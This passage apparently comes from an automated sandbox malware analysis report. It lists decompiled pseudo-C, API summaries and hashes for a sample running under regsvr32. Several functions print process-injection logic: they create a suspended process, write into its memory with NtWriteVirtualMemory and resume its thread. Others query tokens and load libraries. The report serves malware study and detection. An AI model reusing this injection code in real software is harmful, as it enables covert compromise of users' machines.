				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0316D7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x317f8d4; // 0x4fafc00
				_t7 = _t38 + 0xac; // 0xa4858137
				E0316B6E3( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E03168DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E03168F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0316BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0316D9DE(E03166297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x317f8d0; // 0x4faf8c0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E0316DADC( &_v40);
									_t63 =  *0x317f8d0; // 0x4faf8c0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x317f8d0; // 0x4faf8c0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x317f8d0; // 0x4faf8c0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x317f8d0; // 0x4faf8c0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x317f8d0; // 0x4faf8c0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E03168DDF(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























            0x0316d88f
            0x0316d898
            0x0316d89b
            0x0316d89d
            0x0316d8a2
            0x0316d8a4
            0x0316d8a7
            0x0316d8a9
            0x0316d9dd
            0x0316d9dd
            0x0316d8af
            0x0316d8b8
            0x0316d8c1
            0x0316d8c6
            0x0316d8c9
            0x0316d8ce
            0x0316d9ca
            0x0316d9d0
            0x00000000
            0x0316d9d9
            0x0316d8d4
            0x0316d8dc
            0x0316d8de
            0x0316d8e1
            0x0316d8f0
            0x0316d8fb
            0x0316d901
            0x0316d906
            0x0316d908
            0x0316d915
            0x0316d91d
            0x0316d928
            0x0316d933
            0x0316d937
            0x0316d939
            0x0316d942
            0x0316d949
            0x0316d94e
            0x0316d950
            0x0316d955
            0x0316d95b
            0x0316d95d
            0x0316d95d
            0x0316d95e
            0x0316d95e
            0x0316d964
            0x0316d964
            0x0316d967
            0x0316d967
            0x0316d91d
            0x0316d96e
            0x0316d972
            0x0316d974
            0x0316d97d
            0x0316d97d
            0x0316d983
            0x0316d98b
            0x0316d98e
            0x0316d996
            0x0316d996
            0x0316d999
            0x0316d99a
            0x0316d9a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316d9a0
            0x0316d9a9
            0x0316d9ac
            0x0316d9ad
            0x0316d9b2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0316d9b8
            0x00000000
            0x00000000
            0x00000000
            0x0316d9b8
            0x0316d9b8
            0x0316d9bb
            0x0316d9c1
            0x0316d9c5

            APIs
              • Part of subcall function 03168F63: memset.MSVCRT ref: 03168F75
              • Part of subcall function 0316BE10: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0316BE52
              • Part of subcall function 0316D9DE: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0316DA40
              • Part of subcall function 0316D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0316DA89
              • Part of subcall function 0316D9DE: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0316DAA6
              • Part of subcall function 0316D9DE: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0316DAC7
            • GetLastError.KERNEL32(?,?,00000001), ref: 0316D939
              • Part of subcall function 0316DADC: ResumeThread.KERNELBASE(?,0316D947,?,?,00000001), ref: 0316DAE4
            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 0316D964
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
            • String ID:
            • API String ID: 2212882986-0
            • Opcode ID: 950007f8124c31921475d29ce9db5b3e9dbb7e7933f6316e291094ccf5cdf5cd
            • Instruction ID: 5aa31dfa89c6a0a4dcea3f0677a64a93af97780a1e80b89e6bc42df895bac974
            • Opcode Fuzzy Hash: 950007f8124c31921475d29ce9db5b3e9dbb7e7933f6316e291094ccf5cdf5cd
            • Instruction Fuzzy Hash: A841A276A00209AFCB14EFE9D984EAEB7F9FF4C310F1840A5E905E7254D7309A61CB20
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03166603 Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 61%
            			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x317f8d0; // 0x4faf8c0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E03168DB4();
				E03169787();
				 *0x317f8e8 = _a4;
				E03173D36(_a4);
				 *_t49 = 0xf2e;
				 *0x317f8d0 = E0316F0D9(0x317ca88, 0x138);
				 *_t49 = 0xe8d;
				_t23 = E03169F85(0x317ca88);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E03168D9A();
					 *_t49 = 0x1f4;
					_t28 = E0316FCDA(E0316109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x317f8e0 = E0316F0D9(0x317cbf0, _t48);
						E0316647A(_t48, __eflags);
						E03168DDF( &_a8, 0xfffffffe);
						_t36 =  *0x317f8d0; // 0x4faf8c0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x641);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E031663A2, 0, 0,  &_v8);
					 *0x317f8f4 = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E03168D9A();
				goto L3;
			}













            0x03166606
            0x0316660b
            0x031666ef
            0x031666f3
            0x031666e8
            0x031666ea
            0x00000000
            0x031666ea
            0x031666f5
            0x031666ff
            0x0316666a
            0x00000000
            0x0316666a
            0x03166611
            0x03166616
            0x0316661f
            0x03166624
            0x0316662e
            0x0316663f
            0x03166644
            0x0316664b
            0x03166650
            0x03166652
            0x03166655
            0x03166661
            0x03166662
            0x0316666e
            0x03166673
            0x03166682
            0x03166687
            0x0316668a
            0x0316668c
            0x03166695
            0x031666a0
            0x031666a5
            0x031666b0
            0x031666b5
            0x031666bf
            0x031666bf
            0x031666d9
            0x031666dc
            0x031666df
            0x031666e4
            0x031666e6
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x031666e6
            0x03166664
            0x00000000

            APIs
              • Part of subcall function 03168DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,03166616), ref: 03168DBD
              • Part of subcall function 0316F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F0FB
            • GetFileAttributesW.KERNELBASE(00000000), ref: 03166655
            • CreateThread.KERNELBASE(00000000,00000000,031663A2,00000000,00000000,?), ref: 031666DC
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Create$AttributesFileHandleHeapModuleThread
            • String ID:
            • API String ID: 607385197-0
            • Opcode ID: 37de922ba36eaa62f74f91dcded22c407d0ac98da414a3c492624d8f1663df3e
            • Instruction ID: df4bc0fd26cbb9e2094e97a73ccec9ed3679a7acfe533fd3923ec7de62537b6e
            • Opcode Fuzzy Hash: 37de922ba36eaa62f74f91dcded22c407d0ac98da414a3c492624d8f1663df3e
            • Instruction Fuzzy Hash: 6E2119B6504305AFDB08FFF5E904A6E37F9AB4C310F198529A52ADE1C4EB74C5A18B21
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316F0D9 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 329 316f0d9-316f0f9 call 3169f6b 332 316f103-316f108 LoadLibraryA 329->332 333 316f0fb-316f101 GetModuleHandleA 329->333 334 316f10a-316f10c 332->334 333->334 335 316f10e-316f113 call 316f08e 334->335 336 316f11b-316f129 call 3168d87 334->336 340 316f118-316f119 335->340 340->336
            C-Code - Quality: 47%
            			E0316F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E03169F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0316F08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E03168D87( &_v8);
				return _t25;
			}










            0x0316f0dc
            0x0316f0df
            0x0316f0e5
            0x0316f0e7
            0x0316f0ec
            0x0316f0ee
            0x0316f0f8
            0x0316f0f9
            0x0316f108
            0x0316f0fb
            0x0316f0fb
            0x0316f0fb
            0x0316f10c
            0x0316f113
            0x0316f119
            0x0316f119
            0x0316f11e
            0x0316f129

            APIs
            • GetModuleHandleA.KERNEL32(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F0FB
            • LoadLibraryA.KERNELBASE(00000000,?,?,?,0317CA88,?,0316663F,?), ref: 0316F108
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID:
            • API String ID: 4133054770-0
            • Opcode ID: 7cd5fab72424ff680ac461528a9bb260ea8c5518e1d82b3cf0e991f840f729e5
            • Instruction ID: 890c7a4f13503504021de620f167a4b685e08f03ff4c863cf19e6cd15ffb1ede
            • Opcode Fuzzy Hash: 7cd5fab72424ff680ac461528a9bb260ea8c5518e1d82b3cf0e991f840f729e5
            • Instruction Fuzzy Hash: 16F0A772310214ABC708EBE9E84485AB7FD9F4C291B15417AF006D7240DFB08D9287A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316CA5A Relevance: 1.6, APIs: 1, Instructions: 82COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 341 316ca5a-316ca79 call 316c92f 344 316cb14-316cb17 341->344 345 316ca7f-316ca96 call 316c986 341->345 348 316caf6-316cb04 FindCloseChangeNotification 345->348 349 316ca98-316cab9 345->349 350 316cb06-316cb11 call 3168ddf 348->350 351 316cb12 348->351 349->348 355 316cabb-316cabd 349->355 350->351 351->344 356 316cabf-316cac2 355->356 357 316cae9-316caf4 355->357 358 316cac5-316cad4 356->358 357->348 361 316cae6-316cae8 358->361 362 316cad6-316cae2 358->362 361->357 362->358 363 316cae4 362->363 363->357
            C-Code - Quality: 47%
            			E0316CA5A(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E0316C92F(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E0316C986(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E03168DDF( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x317f8d8; // 0x4fafab0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x317f8d8; // 0x4fafab0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x317f8d8; // 0x4fafab0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















            0x0316ca61
            0x0316ca63
            0x0316ca6a
            0x0316ca6c
            0x0316ca6f
            0x0316ca74
            0x0316ca79
            0x0316ca83
            0x0316ca86
            0x0316ca89
            0x0316ca8e
            0x0316ca90
            0x0316ca96
            0x0316caf6
            0x0316cafe
            0x0316cb04
            0x0316cb0b
            0x0316cb11
            0x00000000
            0x0316cb12
            0x0316ca9b
            0x0316ca9c
            0x0316ca9d
            0x0316ca9e
            0x0316ca9f
            0x0316caa0
            0x0316caa1
            0x0316caa2
            0x0316caa7
            0x0316caa9
            0x0316caae
            0x0316caaf
            0x0316cab9
            0x00000000
            0x00000000
            0x0316cabd
            0x0316cae9
            0x0316cae9
            0x0316caf1
            0x0316caf4
            0x00000000
            0x0316caf4
            0x0316cabf
            0x0316cabf
            0x0316cac2
            0x0316cac5
            0x0316cac5
            0x0316cac8
            0x0316caca
            0x0316cad4
            0x00000000
            0x00000000
            0x0316cad9
            0x0316cada
            0x0316cadd
            0x0316cae2
            0x00000000
            0x00000000
            0x00000000
            0x0316cae4
            0x0316cae8
            0x00000000
            0x0316cae8
            0x0316cb17

            APIs
              • Part of subcall function 0316C92F: GetCurrentThread.KERNEL32 ref: 0316C942
              • Part of subcall function 0316C92F: OpenThreadToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C949
              • Part of subcall function 0316C92F: GetLastError.KERNEL32(?,?,0316CA74,00000000,03160000), ref: 0316C950
              • Part of subcall function 0316C92F: OpenProcessToken.ADVAPI32(00000000,?,?,0316CA74,00000000,03160000), ref: 0316C975
              • Part of subcall function 0316C986: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,03160000,00000000,00000000,?,0316CA07,00000000,00000000,?,0316CA30), ref: 0316C9A1
              • Part of subcall function 0316C986: GetLastError.KERNEL32(?,0316CA07,00000000,00000000,?,0316CA30,00001644,?,0316E053), ref: 0316C9A8
            • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,03160000), ref: 0316CAFE
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
            • String ID:
            • API String ID: 1806447117-0
            • Opcode ID: 7960cfc6c846f044df7e6647f943c07f521807184c2b0980e74d4e8ca9c5c3c3
            • Instruction ID: c3f5e28f84aebfe1a77e322c0b08ee5e993648b1a28cf9e434592b68045d87c8
            • Opcode Fuzzy Hash: 7960cfc6c846f044df7e6647f943c07f521807184c2b0980e74d4e8ca9c5c3c3
            • Instruction Fuzzy Hash: 7E214F32A00205AFDB10EFE9DC85AAEF7F8FF4C700B184469E541E7291E77099519BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 031663A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 364 31663a2-31663bb call 316651e GetOEMCP call 316dfc2 369 31663c0-31663eb call 3173c36 364->369 370 31663bd-31663be 364->370 374 31663f5-31663fb call 316d889 369->374 375 31663ed-31663f3 369->375 371 3166435 370->371 378 3166400-3166407 374->378 376 316640f-316641b 375->376 379 316642d call 3163597 376->379 380 316641d-3166422 call 31661e8 376->380 381 3166424-316642b 378->381 382 3166409 378->382 385 3166432-3166434 379->385 380->385 381->379 381->385 382->376 385->371
            C-Code - Quality: 100%
            			E031663A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E0316651E();
				GetOEMCP();
				_t13 = E0316DFC2(__fp0); // executed
				 *0x317f8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x317f8d4; // 0x4fafc00
					_t2 = _t14 + 0x224; // 0x3160000
					E03173C36( *_t2);
					_t26 =  *0x317f8d4; // 0x4fafc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x3160000, executed
						_t26 =  *_t7;
						_t16 = E0316D889( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x317f8d4; // 0x4fafc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E03163597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x317f8d4; // 0x4fafc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E031661E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











            0x031663a2
            0x031663a2
            0x031663a7
            0x031663ae
            0x031663b3
            0x031663bb
            0x031663c4
            0x031663ca
            0x031663cf
            0x031663d5
            0x031663da
            0x031663e0
            0x031663e1
            0x031663eb
            0x031663f5
            0x031663f5
            0x031663fb
            0x03166400
            0x03166402
            0x03166407
            0x03166424
            0x0316642b
            0x03166432
            0x03166432
            0x00000000
            0x03166434
            0x0316642d
            0x0316642d
            0x00000000
            0x0316642d
            0x03166409
            0x0316640f
            0x0316640f
            0x03166414
            0x0316641b
            0x00000000
            0x00000000
            0x0316641d
            0x00000000
            0x0316641d
            0x031663ed
            0x00000000
            0x031663ed
            0x00000000

            APIs
            • GetOEMCP.KERNEL32 ref: 031663A7
              • Part of subcall function 0316DFC2: GetCurrentProcessId.KERNEL32 ref: 0316DFE9
              • Part of subcall function 0316DFC2: GetLastError.KERNEL32 ref: 0316E0E3
              • Part of subcall function 0316DFC2: GetSystemMetrics.USER32(00001000), ref: 0316E0F3
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CurrentErrorLastMetricsProcessSystem
            • String ID:
            • API String ID: 1196160345-0
            • Opcode ID: a101dc125c1b8ebb113911b7130c5d617f7b443f0c4545930a68b39b2f758ef6
            • Instruction ID: 3d5d21272fc906caad4fb871d73a9dd129fa9299fb97fd34e16a10658d774872
            • Opcode Fuzzy Hash: a101dc125c1b8ebb113911b7130c5d617f7b443f0c4545930a68b39b2f758ef6
            • Instruction Fuzzy Hash: 9001E8792092529FC718FBA8E908AA6B7E8EF5D310F1D45B6E1488A155C77084F1CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316CA0A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0316CA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x317f8d8; // 0x4fafab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0316C9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x317f8d0; // 0x4faf8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










            0x0316ca0e
            0x0316ca16
            0x0316ca1e
            0x0316ca23
            0x0316ca2b
            0x0316ca30
            0x0316ca34
            0x0316ca52
            0x0316ca55
            0x0316ca36
            0x0316ca39
            0x0316ca3b
            0x0316ca43
            0x0316ca43
            0x0316ca46
            0x0316ca46
            0x0316ca59
            0x0316ca26
            0x0316ca26
            0x0316ca26

            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7d68bb2799ace0f4e19537943af777b8b63557d5b530b498cf5cff5cef635c0f
            • Instruction ID: 4e1628f99d045f0204ffcb3e67eceab80be7dc8ee4f78dd730a5f611370eaa28
            • Opcode Fuzzy Hash: 7d68bb2799ace0f4e19537943af777b8b63557d5b530b498cf5cff5cef635c0f
            • Instruction Fuzzy Hash: D3F01731A11215EFCB14EBA8C945A9EB3F8BF0C345F0990A4E541E7150E774DA50DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03166438 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03166438() {
				intOrPtr _t3;

				_t3 =  *0x317f8d0; // 0x4faf8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x317f8f4, 0xffffffff);
				ExitProcess(0);
			}




            0x03166438
            0x03166445
            0x0316644f

            APIs
            • ExitProcess.KERNEL32(00000000), ref: 0316644F
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ExitProcess
            • String ID:
            • API String ID: 621844428-0
            • Opcode ID: 6e736ed74219f03a5763812307a57609ee06db5e17556fc234953ed1cb9e46a4
            • Instruction ID: 320625cc765fe1616611c77c4ca6b82f2340ab60b5c0293f3634e9764c8b5793
            • Opcode Fuzzy Hash: 6e736ed74219f03a5763812307a57609ee06db5e17556fc234953ed1cb9e46a4
            • Instruction Fuzzy Hash: 1AC002712181519FC748BB64D949F1637F0BF0C322F1D86A5F6299A1EDCA2094A19B20
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03168DC9 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03168DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x317f9b8, 8, _a4); // executed
				return _t2;
			}




            0x03168dd7
            0x03168dde

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?,?,03169793,00000100,?,0316661B), ref: 03168DD7
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: f2c0d3fe7894a1254c4f66324bff2c841299b8f43b15fc36e99ab48fe695dbb0
            • Instruction ID: bf91f1df1451ef6f6f8f44baa4d02c9ceac1c44387818a58175f60054c2c78ba
            • Opcode Fuzzy Hash: f2c0d3fe7894a1254c4f66324bff2c841299b8f43b15fc36e99ab48fe695dbb0
            • Instruction Fuzzy Hash: 54B0923A08020CBBCF452A81EC05A857F3DFB0C651F444010F608480648B6365A69BA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316DADC Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E0316DADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




            0x0316dae4
            0x0316daec
            0x0316daf1

            APIs
            • ResumeThread.KERNELBASE(?,0316D947,?,?,00000001), ref: 0316DAE4
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ResumeThread
            • String ID:
            • API String ID: 947044025-0
            • Opcode ID: e9e8db0eda4e8c66ff9618fdfb1cb18a03dbf6627894a52a5308674317bf305e
            • Instruction ID: b83412d7be8b49df41b8c864ccd48cb9e10c0dbe5c5ece7bb5ebca1009ecffc8
            • Opcode Fuzzy Hash: e9e8db0eda4e8c66ff9618fdfb1cb18a03dbf6627894a52a5308674317bf305e
            • Instruction Fuzzy Hash: ADB092322A00019BCB006B74D80A9A03BE0BB5A606B9CC2E4A015C60A5C22AC4968B40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03168DB4 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E03168DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x317f9b8 = _t1;
				return _t1;
			}




            0x03168dbd
            0x03168dc3
            0x03168dc8

            APIs
            • HeapCreate.KERNELBASE(00000000,00096000,00000000,03166616), ref: 03168DBD
            Memory Dump Source
            • Source File: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_3160000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: 0c8c30f73c354ee2f08f09b9843f856ec03c8a8d7037a903a6e1bc28d345b537
            • Instruction ID: ec16c63047cfcfc621537bb4a8aa27a6bb18fdfcaaae59af74a85aec57cb1d58
            • Opcode Fuzzy Hash: 0c8c30f73c354ee2f08f09b9843f856ec03c8a8d7037a903a6e1bc28d345b537
            • Instruction Fuzzy Hash: 54B01270695300A6DB542B205C46B017530634CB02F240005B609981C8C7B010819934
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0316DAF2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
            Download Yara Rule
            C-Code - Quality: 91%
            			E0316DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
